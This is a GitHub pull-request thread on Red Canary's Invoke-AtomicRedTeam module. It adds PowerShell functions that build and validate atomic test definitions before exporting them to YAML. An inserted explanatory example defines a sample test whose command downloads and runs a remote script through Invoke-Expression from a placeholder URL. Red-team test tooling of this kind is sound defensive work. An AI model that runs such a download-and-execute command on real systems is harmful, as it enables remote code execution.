redcanaryco / invoke-atomicredteam

Invoke-AtomicRedTeam is a PowerShell module to execute tests as defined in the [atomics folder](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics) of Red Canary's Atomic Red Team project.
MIT License

Adding atomic technique/test creation functions #3

Closed mgraeber-rc closed 4 years ago

mgraeber-rc commented 4 years ago

I've never personally found it to be easy or scalable to write atomic techniques/tests in YAML. I added the following functions to invoke-atomicredteam so that atomic techniques/tests can be developed in pure PowerShell:

The output of these functions is designed to be piped directly to ConvertTo-Yaml.

These functions solve the following problems for me:

  1. Writing YAML by hand is prone to errors
  2. The only other existing atomic YAML generation code is in the atomic-red-team repo which just generates a template YAML stub.
  3. Previously, there existed no option to write atomic technique/tests in pure code. This allows that, and validation is performed before any object is returned, so that there is a relatively safe guarantee that generated YAML is conformant to the atomic schema.

clr2of8 commented 4 years ago
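To illustrate the approach described in the comment above (build the technique as a PowerShell object, validate it before returning, then pipe to ConvertTo-Yaml), here is an added example written for this page. It is not the code from this PR, whose function names are not shown here; `New-AtomicTestStub` is a hypothetical helper, and it assumes the `powershell-yaml` module (which provides `ConvertTo-Yaml`) is installed. The validation it performs is the kind hand-written YAML gets wrong: technique ID format, allowed executor and platform names, and agreement between `#{placeholder}` references in the command and the declared `input_arguments`.

```powershell
# Added example, not the functions from this PR. Assumes the powershell-yaml module
# (Install-Module powershell-yaml) supplies ConvertTo-Yaml.
function New-AtomicTestStub {
    [CmdletBinding()]
    param(
        # ATT&CK technique ID, e.g. T1059 or T1059.001
        [Parameter(Mandatory)]
        [ValidatePattern('^T\d{4}(\.\d{3})?$')]
        [string] $AttackTechnique,

        [Parameter(Mandatory)] [string] $DisplayName,
        [Parameter(Mandatory)] [string] $TestName,
        [Parameter(Mandatory)] [string] $Description,

        [Parameter(Mandatory)]
        [ValidateSet('windows', 'linux', 'macos')]
        [string[]] $SupportedPlatforms,

        [Parameter(Mandatory)]
        [ValidateSet('command_prompt', 'powershell', 'sh', 'bash', 'manual')]
        [string] $ExecutorName,

        [Parameter(Mandatory)] [string] $Command,

        # name -> @{ description = ...; type = 'String'|'Path'|'Url'|'Integer'; default = ... }
        [hashtable] $InputArguments = @{},

        [switch] $ElevationRequired
    )

    # Every #{placeholder} in the command must be declared, and every declared argument must be used.
    $used = [regex]::Matches($Command, '#\{(\w+)\}') |
        ForEach-Object { $_.Groups[1].Value } | Sort-Object -Unique
    foreach ($name in $used) {
        if (-not $InputArguments.ContainsKey($name)) {
            throw "Command references #{$name} but no input_argument named '$name' is declared."
        }
    }
    foreach ($name in $InputArguments.Keys) {
        if ($name -notin $used) { throw "input_argument '$name' is declared but never used in the command." }
        foreach ($key in 'description', 'type', 'default') {
            if (-not $InputArguments[$name].ContainsKey($key)) { throw "input_argument '$name' is missing '$key'." }
        }
        if ($InputArguments[$name].type -notin 'String', 'Path', 'Url', 'Integer') {
            throw "input_argument '$name' has unsupported type '$($InputArguments[$name].type)'."
        }
    }

    # Ordered dictionaries keep the emitted YAML key order stable from run to run.
    $inputArgs = [ordered]@{}
    foreach ($name in ($InputArguments.Keys | Sort-Object)) {
        $inputArgs[$name] = [ordered]@{
            description = $InputArguments[$name].description
            type        = $InputArguments[$name].type
            default     = $InputArguments[$name].default
        }
    }

    $test = [ordered]@{
        name                = $TestName
        description         = $Description
        supported_platforms = @($SupportedPlatforms)
    }
    if ($inputArgs.Count -gt 0) { $test.input_arguments = $inputArgs }
    $test.executor = [ordered]@{
        name               = $ExecutorName
        elevation_required = [bool] $ElevationRequired
        command            = $Command
    }

    [ordered]@{
        attack_technique = $AttackTechnique
        display_name     = $DisplayName
        atomic_tests     = @($test)
    }
}

# Usage (constructed sample test): build the object in code, then serialize it to atomic YAML.
New-AtomicTestStub -AttackTechnique 'T1059.001' `
    -DisplayName 'Command and Scripting Interpreter: PowerShell' `
    -TestName 'Download and execute via Invoke-Expression' `
    -Description 'Constructed example test body for demonstration.' `
    -SupportedPlatforms windows -ExecutorName powershell `
    -Command 'Invoke-Expression (New-Object Net.WebClient).DownloadString("#{url}")' `
    -InputArguments @{ url = @{ description = 'URL of the script to fetch'; type = 'Url'; default = 'https://example.com/payload.ps1' } } |
    ConvertTo-Yaml
```

Because the checks run inside the function, a mistyped technique ID, an unknown executor, or a `#{url}` placeholder with no matching `input_arguments` entry throws before any object reaches `ConvertTo-Yaml`, which is the guarantee the comment describes. Adding a platform or type that the atomic schema later accepts is a one-line change to the corresponding `ValidateSet` or type list.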

Looks amazing Matt, I'll try it out tomorrow!